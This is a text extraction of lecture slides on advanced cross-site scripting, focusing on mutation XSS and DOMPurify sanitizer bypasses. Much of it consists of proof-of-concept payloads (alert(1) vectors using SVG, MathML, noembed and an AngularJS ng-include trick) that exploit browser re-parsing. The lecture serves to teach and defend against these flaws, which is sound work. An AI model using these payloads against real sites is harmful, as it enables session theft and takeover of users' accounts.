![Page 1: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/1.jpg)
Web & Browser SecurityDay Two: Advanced XSSA lecture by Dr.-Ing. Mario [email protected] || [email protected]
This is the day where we cover crazy stuff. Crazy.
![Page 2: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/2.jpg)
Our Dear Lecturer● Dr.-Ing. Mario Heiderich
● Ex-Researcher and now Lecturer, Ruhr-Uni Bochum● PhD Thesis about Client Side Security and Defense
● Founder & Director of Cure53 ● Pentest- & Security-Firm located in Berlin● Security, Consulting, Workshops, Trainings● Ask for an internship if the force is strong with you
● Published Author and Speaker● Specialized on HTML5, DOM and SVG Security● JavaScript, XSS and Client Side Attacks
● Maintains DOMPurify● A top notch JS-only Sanitizer, also, couple of other projects
● Can be contacted but prefers not to be● [email protected]● [email protected]
![Page 3: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/3.jpg)
Act One
Advanced XSS
![Page 4: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/4.jpg)
And, before get started. Let's think about Self-XSS.
And one kind of CSRF. And how we can abuse that.
![Page 5: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/5.jpg)
[...]
![Page 6: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/6.jpg)
Mutations in the DOM: mXSS● This attack is basically a nightmare come true.
Browsers turned against webapps.● Imagine, the browser turns harmless HTML into a dangerous attack vectors. ● The server will assume sane markup and no risk
● This issue indeed exists, first reported in 2006● „Broken Print-Preview“ http://is.gd/fLVScq
● String-Mutation in certain DOM properties● Result: µXSS, mXSS or “Mutation XSS”● Back then, affected applications and libraries:● 2+ Million libraries according to Github
● 6+ vector classes, affect webmailers, everyone with a RTE● Yahoo! Mail, OWA, Hotmail, Sharepoint, etc.● And DOMPurify of course, massively so
● Let's have a closeer look at this!
Yay! DEMO
![Page 7: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/7.jpg)
Or, to be more clear● Attacker submits HTML● Server receives it to sanitize
● Says, that looks safe, all fine● Sends it back to browser
● Browser receives HTML● Renders it initially, all fine● Some DOM logic fiddles with it● Browser re-renders, HTML mutates
● Injected JavaScript activates and fires
![Page 8: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/8.jpg)
New Variations
Both vectors identified and published by Gareth Heyes
<%/z=%><p/onresize=alert(1)//>
<div='/x='><iframe/onload=alert(1)>>
![Page 9: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/9.jpg)
![Page 10: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/10.jpg)
Other BrowsersFirefox cannot be trusted with innerHTML and SVG
<script>document.write('<svg><p><style><img
src="</style><img src=x onerror=alert(1)//">')
</script>
Chrome cannot be trusted with Unicode(sadly fixed in Chrome 62)
<a href= javascript:alert(1)>CLICK
![Page 11: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/11.jpg)
Other BrowsersChrome recently fixed another mXSS problem
<math><annotation-xml encoding="text/html"><xmp></xmp><img src=x onerror=alert(1)></xmp></annotation-
xml></math>
![Page 12: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/12.jpg)
![Page 13: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/13.jpg)
![Page 14: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/14.jpg)
Check out the video!https://is.gd/oRNBLZ
And all the code!https://is.gd/SdP0SK
![Page 15: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/15.jpg)
But it gets worse● Autumn 2019 was mXSS season. Sadly for us.● DOMPurify got hit by a good dozen of bypasses● First found by a 3rd Party, Micha Bentkowskił Bentkowski
● The rest then found “internally”● There was two root causes
● An internal switch in document types changes the parser type● A sudden change in document structure changes the parser type
![Page 16: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/16.jpg)
mXSS Root-Cause One● An internal switch in document types changes the
parser type● The browser thinks it’s XML, then thinks it’s HTML● Once that “reconsideration” happens, HTML gets
interpreted differently● This causes bypasses, even and especially in DOM
sanitizers like DOMPurify
![Page 17: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/17.jpg)
<svg></p><style><a id="</style><img src=1
onerror=alert(1)>">
![Page 18: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/18.jpg)
<svg></p><style><a id="</style><img src=1
onerror=alert(1)>">
![Page 19: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/19.jpg)
<svg><p></p><style><a id="</style><img src=1
onerror=alert(1)>">
![Page 20: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/20.jpg)
mXSS Root-Cause Two● A sudden change in document structure changes the
parser type● The switch is triggered by for example element
removal● Browser thinks XML, element gets removed, browser
now thinks HTML● And as that happens, the HTML gets interpreted
differently
![Page 21: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/21.jpg)
<noembed><svg><b><style><b title='</style><img src=x
onerror=alert(1)>'>
![Page 22: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/22.jpg)
<noembed><svg><b><style><b title='</style><img src=x
onerror=alert(1)>'>
![Page 23: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/23.jpg)
<noembed><svg><b><style><b title='</style><img src=x
onerror=alert(1)>'>
This element we don’t want, let’s remove it.
![Page 24: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/24.jpg)
removed<svg><b><style><b title='</style><img src=x
onerror=alert(1)>'>
And boom, we force the parser into XML-mode because SVG.Harmless becomes harmful.
![Page 25: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/25.jpg)
removed<svg></svg><b></b><style><b
title='</style><img src=x onerror=alert(1)>'>
![Page 26: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/26.jpg)
Mutations are here to stay● We can observe that mutations cannot be avoided● Problem one: Capability changes
● NoScript, NoEmbed and the likes● Problem two: Context changes
● From SVG to HTML and back, MathML● Problem three: Node Removals
● Forcing the above using node removal● These problems are hard to tackle and will likely
accompany us until we have something better than HTML
![Page 27: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/27.jpg)
![Page 28: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/28.jpg)
AngularJS mXSS Corner Case● In recent AngularJS versions, we can observe an interesting mXSS corner case● This time it's based on unsafe handling of document.createComment()<!doctype html><html ng-app><head><script src="angular.min.js"></script></head><body><b class="ng-include:'somefile?--><svg/onload=alert(1)>'">HELLO</b><button onclick="body.innerHTML+=1">do the mXSS thing</button></body>
![Page 29: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/29.jpg)
[...]
![Page 30: Web & Browser Security · PhD Thesis about Client Side Security and Defense Founder & Director of Cure53 Pentest- & Security-Firm located in Berlin Security, Consulting, Workshops,](https://reader033.vdocument.in/reader033/viewer/2022042000/5e6d7175f30da1321d183fad/html5/thumbnails/30.jpg)
Day Two: Done● Thanks a lot!● Tomorrow, more.● Any questions? Ping me.